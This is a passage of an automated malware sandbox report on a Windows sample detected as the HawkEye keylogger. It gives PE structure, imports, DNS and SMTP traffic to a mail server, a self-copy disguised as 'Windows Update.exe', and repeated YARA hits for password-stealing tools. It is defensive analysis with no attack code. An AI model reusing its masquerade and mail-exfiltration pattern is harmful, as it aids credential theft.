IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x2c6a0 | 0x2c800 | False | 0.231011894312 | data | 4.29448380541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37310 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x47b38 | 0x94a8 | data | English | United States
RT_ICON | 0x50fe0 | 0x5488 | data | English | United States
RT_ICON | 0x56468 | 0x46d5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x5ab40 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 4294902528 | English | United States
RT_ICON | 0x5ed68 | 0x25a8 | data | English | United States
RT_ICON | 0x61310 | 0x10a8 | data | English | United States
RT_ICON | 0x623b8 | 0x988 | data | English | United States
RT_ICON | 0x62d40 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x631a8 | 0x100 | data | English | United States
RT_DIALOG | 0x632a8 | 0x11c | data | English | United States
RT_DIALOG | 0x633c8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x63428 | 0x84 | data | English | United States
RT_MANIFEST | 0x634b0 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                            Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                            Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/07/21-18:17:50.901213 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49751 | 104.16.155.36 | 192.168.2.5

                                                                                            Network Port Distribution

                                                                                            TCP Packets


                                                                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 7, 2021 18:17:50.769954920 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Dec 7, 2021 18:17:50.789781094 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Dec 7, 2021 18:18:09.537185907 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Dec 7, 2021 18:18:09.558381081 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5

                                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 7, 2021 18:17:50.769954920 CET | 192.168.2.5 | 8.8.8.8 | 0xa183 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Dec 7, 2021 18:18:09.537185907 CET | 192.168.2.5 | 8.8.8.8 | 0x3860 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)

                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 7, 2021 18:17:50.789781094 CET | 8.8.8.8 | 192.168.2.5 | 0xa183 | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
Dec 7, 2021 18:17:50.789781094 CET | 8.8.8.8 | 192.168.2.5 | 0xa183 | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)
Dec 7, 2021 18:18:09.558381081 CET | 8.8.8.8 | 192.168.2.5 | 0x3860 | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • whatismyipaddress.com

                                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49751 | 104.16.155.36 | 80 | C:\Users\user\AppData\Roaming\Windows Update.exe

Timestamp | kBytes transferred | Direction | Data
Dec 7, 2021 18:17:50.871639013 CET | 863 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Dec 7, 2021 18:17:50.901212931 CET | 864 | IN | HTTP/1.1 403 Forbidden
Date: Tue, 07 Dec 2021 17:17:50 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: __cf_bm=nPhtfuKxYyjGLb17cnOMiRcfLWZkAYSylJ_4tWGJvsI-1638897470-0-AeeMaTLcClFuMkrEhsDP2NYk7ySOraaBkkWDTNnL+xjrSfjvEI6kvtx4e8naTR8mQS8tzHgtAM3Fu23Ag4Cpeiw=; path=/; expires=Tue, 07-Dec-21 17:47:50 GMT; domain=.whatismyipaddress.com; HttpOnly
Server: cloudflare
CF-RAY: 6b9f68e8fbc9432d-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
Data Ascii: error code: 1020


                                                                                            SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 7, 2021 18:18:09.881150961 CET | 587 | 49765 | 66.29.159.53 | 192.168.2.5 | 220 PrivateEmail.com prod Mail Node
Dec 7, 2021 18:18:09.882308960 CET | 49765 | 587 | 192.168.2.5 | 66.29.159.53 | EHLO 088753
Dec 7, 2021 18:18:10.040832996 CET | 587 | 49765 | 66.29.159.53 | 192.168.2.5 | 250-mta-05.privateemail.com
250-PIPELINING
250-SIZE 81788928
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-CHUNKING
250 STARTTLS
Dec 7, 2021 18:18:10.042723894 CET | 49765 | 587 | 192.168.2.5 | 66.29.159.53 | STARTTLS
Dec 7, 2021 18:18:10.201702118 CET | 587 | 49765 | 66.29.159.53 | 192.168.2.5 | 220 Ready to start TLS

                                                                                            Code Manipulations

                                                                                            System Behavior

                                                                                            General

                                                                                            Start time: 18:17:20
                                                                                            Start date: 07/12/2021
                                                                                            Path: C:\Users\user\Desktop\5.exe
                                                                                            Wow64 process (32bit): true
                                                                                            Commandline: "C:\Users\user\Desktop\5.exe"
                                                                                            Imagebase: 0x400000
                                                                                            File size: 852277 bytes
                                                                                            MD5 hash: 3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges: true
                                                                                            Has administrator privileges: true
                                                                                            Programmed in: C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation: low

                                                                                            General

                                                                                            Start time: 18:17:22
                                                                                            Start date: 07/12/2021
                                                                                            Path: C:\Users\user\Desktop\5.exe
                                                                                            Wow64 process (32bit): true
                                                                                            Commandline: "C:\Users\user\Desktop\5.exe"
                                                                                            Imagebase: 0x400000
                                                                                            File size: 852277 bytes
                                                                                            MD5 hash: 3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges: true
                                                                                            Has administrator privileges: true
                                                                                            Programmed in: .Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation: low

                                                                                            General

                                                                                            Start time: 18:17:38
                                                                                            Start date: 07/12/2021
                                                                                            Path: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Wow64 process (32bit): true
                                                                                            Commandline: "C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                            Imagebase: 0x400000
                                                                                            File size: 852277 bytes
                                                                                            MD5 hash: 3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges: true
                                                                                            Has administrator privileges: true
                                                                                            Programmed in: C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 31%, ReversingLabs
                                                                                            Reputation: low

                                                                                            General

                                                                                            Start time: 18:17:41
                                                                                            Start date: 07/12/2021
                                                                                            Path: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Wow64 process (32bit): true
                                                                                            Commandline: "C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                            Imagebase: 0x400000
                                                                                            File size: 852277 bytes
                                                                                            MD5 hash: 3F332B62EEE0970F3189C689D5BD042A
                                                                                            Has elevated privileges: true
                                                                                            Has administrator privileges: true
                                                                                            Programmed in: .Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000A.00000000.350262579.00000000075C0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Author: Joe Security
